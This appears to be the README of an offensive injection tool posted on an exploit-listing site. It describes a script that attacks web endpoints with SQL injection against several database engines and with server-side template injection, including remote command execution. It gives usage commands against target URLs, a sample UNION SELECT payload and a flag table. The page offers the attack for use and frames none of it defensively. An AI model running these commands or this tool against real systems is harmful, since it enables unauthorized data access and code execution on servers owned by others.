injection_exploit

## https://sploitus.com/exploit?id=FF45EECE-67D6-5704-883B-9A438A776CE6
# Injection Exploit

SQLi (6 engines) + SSTI (11 engines) — GET/POST.

```
pip install requests
```

```
# POST (default) — sends payload in request body
python exploit.py --url https://target.com/api/endpoint
python exploit.py --url https://target.com/api/endpoint --mode sqli --db mysql

# GET — appends payload as query string
python exploit.py --url https://target.com/api/endpoint --method GET
python exploit.py --url https://target.com/api/endpoint --method GET --mode sqli --db mysql

# SSTI RCE
python exploit.py --url https://target.com/api/endpoint --mode ssti-rce --cmd "whoami"

# Custom target param and payload
python exploit.py --url https://target.com/api/endpoint --inject qqq --method GET
python exploit.py --url https://target.com/api/endpoint --mode single --value "1' UNION SELECT @@version--"
```

| Flag        | Default               | Description                    |
|-------------|-----------------------|--------------------------------|
| `--url`     | —                     | Target URL (full endpoint)     |
| `--params`  | `kali=0&qq=0&qqq=kali`| Request params                |
| `--inject`  | `kali`                | Parameter to inject           |
| `--method`  | `POST`                | GET or POST                   |
| `--format`  | `json`                | json/form/xml                 |
| `--db`      | all                   | mysql/mssql/postgres/oracle/sqlite |
| `--mode`    | `auto`                | detect/sqli/ssti/ssti-rce/single |
| `--cmd`     | `id`                  | Command for RCE               |
| `--timeout` | 15                    | Request timeout               |